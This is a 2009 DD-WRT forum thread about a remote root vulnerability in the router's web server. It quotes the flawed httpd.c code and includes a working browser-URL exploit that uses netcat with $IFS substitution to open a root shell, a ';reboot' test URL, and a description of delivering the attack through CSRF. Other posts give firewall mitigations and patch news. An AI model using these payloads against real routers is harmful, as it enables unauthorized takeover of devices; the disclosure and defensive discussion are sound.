DD-WRT Root exploit posted today

Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware
Goto page 1, 2, 3 ... 13, 14, 15  Next
Author Message
chris
Site Admin


Joined: 06 Jun 2006
Posts: 101
Location: Germany, Bensheim

PostPosted: Mon Jul 20, 2009 21:49    Post subject: Reply with quote
Hi,

this post was written on 2009-07-22 21:30

the exploit also could be stopped, using a firewall rule.

Go to your router, "Administration", "Commands" and enter the follwing text:

insmod ipt_webstr
ln -s /dev/null /tmp/exec.tmp
iptables -D INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset

and press "Save Firewall", then reboot your router.

This rule blocks any try to access sth that has "cgi-bin" in the url.

You can proove, that the rule works by entering: http://192.168.1.1/cgi-bin/;reboot in your browser. That should give a "Connection was reset" (Firefox).

Important Note: this does not work, if https managment is turned on.

You need to turn off https managment. If you don't want to do that, PLEASE UPDATE.

_________________
NewMedia-NET GmbH
Christian Scheele (CEO)
http://www.dd-wrt.com


Last edited by chris on Thu Jul 23, 2009 13:24; edited 5 times in total
Sponsor
sidewaysstarion
DD-WRT Novice


Joined: 12 Jul 2007
Posts: 4

PostPosted: Mon Jul 20, 2009 21:49    Post subject: DD-WRT Root exploit posted today Reply with quote
This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;


......... (snip)............

899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s</tmp/exec.query\n",
905 server_dir != NULL ?
server_dir : "/www",file);
906 else
907 fprintf(exec, "/%s/%s\n",
908 server_dir != NULL ? server_dir : "/www",
file);
909 fclose(exec);
910
911 if (query) {
912 exec = fopen("/tmp/exec.query", "wb");
913 fprintf(exec, "%s\n", query);

........................
Two issues there:
1) No metacharacters handling
2) Command gets executed even without successful authentication.
You are not going to see any output if not authenticated though.
.......................

914 free(query);
915 fclose(exec);
916 }
917
918 system2("chmod 700 /tmp/exec.tmp");
919 system2("/tmp/exec.tmp>/tmp/shellout.asp");

........... (snip)..........

926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;

------------

3) issue 3: httpd runs as root Smile



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM


Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned Smile


A weird vulnerability you're unlikely to see in 2009 Smile Quite embarrassing I
would say Smile


Thanks krassyo at krassyo.info for his support Smile


Leka vecher Smile

# milw0rm.com [2009-07-20]

source http://milw0rm.org/exploits/9209
autobot
DD-WRT Guru


Joined: 07 May 2009
Posts: 1596

PostPosted: Mon Jul 20, 2009 22:17    Post subject: Reply with quote
This is terrible news for those who use the outdated firmware.
dellsweig
DD-WRT Guru


Joined: 07 Jun 2006
Posts: 1476
Location: New York, USA

PostPosted: Mon Jul 20, 2009 22:30    Post subject: Reply with quote
autobot wrote:
This is terrible news for those who use the outdated firmware.


Can anyone say for sure this was closed in the SP2 builds??
VValdo
DD-WRT Novice


Joined: 13 Apr 2009
Posts: 24

PostPosted: Mon Jul 20, 2009 22:37    Post subject: Reply with quote
I was going to post the same question.

Anyone know if the warning dialog described can be suppressed in other browsers (firefox, safari, opera, etc.)?

W
autobot
DD-WRT Guru


Joined: 07 May 2009
Posts: 1596

PostPosted: Mon Jul 20, 2009 22:43    Post subject: Reply with quote
dellsweig wrote:
autobot wrote:
This is terrible news for those who use the outdated firmware.


Can anyone say for sure this was closed in the SP2 builds??


We need more info about what httpd versions are affected. Someone may want to email Eko or BrainSlayer and give them a heads up.
phuzi0n
DD-WRT Guru


Joined: 10 Oct 2006
Posts: 10141

PostPosted: Mon Jul 20, 2009 23:29    Post subject: Reply with quote
I reproduced this on Eko's broadcom 12476 build.
_________________
Read the forum announcements thoroughly! Be cautious if you're inexperienced.
Available for paid consulting. (Don't PM about complicated setups otherwise)
Looking for bricks and spare routers to expand my collection. (not interested in G spec models)
autobot
DD-WRT Guru


Joined: 07 May 2009
Posts: 1596

PostPosted: Mon Jul 20, 2009 23:36    Post subject: Reply with quote
phuzi0n wrote:
I reproduced this on Eko's broadcom 12476 build.


I am at a loss for words really, this is horrible. A patch will be out soon, but for all those who won't know this its a HUGE issue. Think of the number of affected devices, this is a mini code red.
autobot
DD-WRT Guru


Joined: 07 May 2009
Posts: 1596

PostPosted: Mon Jul 20, 2009 23:40    Post subject: Reply with quote
For those who read this a temporary fix would be to kill httpd, router will still be usable less the web gui.
elektik
DD-WRT Novice


Joined: 25 Sep 2006
Posts: 32

PostPosted: Tue Jul 21, 2009 0:00    Post subject: fixed Reply with quote
its fixed now per brainslayer

[4:43:12 PM] Sebastian (DD-WRT): no its new. but why do these people never inform me!
[4:48:51 PM] Sebastian (DD-WRT): its fixed now.

i would recommenced waiting 12-24 hrs for the nightly build tomorrow and then upgrade.


Last edited by elektik on Tue Jul 21, 2009 0:02; edited 1 time in total
DHC_DarkShadow
DD-WRT Guru


Joined: 22 Jun 2008
Posts: 2440
Location: Am now Dark_Shadow

PostPosted: Tue Jul 21, 2009 0:01    Post subject: Reply with quote
OK fixed in what? The next build?
_________________
The New Me
elektik
DD-WRT Novice


Joined: 25 Sep 2006
Posts: 32

PostPosted: Tue Jul 21, 2009 0:03    Post subject: Reply with quote
next build in about 12-24hrs....i think it has around 13 hours left before the next build, but im not sure the exact schedule.
autobot
DD-WRT Guru


Joined: 07 May 2009
Posts: 1596

PostPosted: Tue Jul 21, 2009 0:03    Post subject: Reply with quote
I made it sound worse than it is I believe, this only applies if you have enabled gui access over wan right?
autobot
DD-WRT Guru


Joined: 07 May 2009
Posts: 1596

PostPosted: Tue Jul 21, 2009 0:09    Post subject: Reply with quote
Does this affect the X86 version? If so brainslayer is in for some po'd IT's.
VValdo
DD-WRT Novice


Joined: 13 Apr 2009
Posts: 24

PostPosted: Tue Jul 21, 2009 0:21    Post subject: Reply with quote
autobot wrote:
I made it sound worse than it is I believe, this only applies if you have enabled gui access over wan right?


Well, as I understand it, yes. Then again, assuming I understand correctly, a malicious web page on the Internet could use a cross-site request forgery (CSRF) to get the user's browser load the page at 192.168.1.1 with a crafted URL to open up WAN access, at which point you're in trouble.

An authentication message may pop up, but the article points out that it can be suppressed in IE so the user would have no way of knowing they've been owned.

W
Goto page 1, 2, 3 ... 13, 14, 15  Next Display posts from previous:    Page 1 of 15
Post new topic   Reply to topic    DD-WRT Forum Index -> Broadcom SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum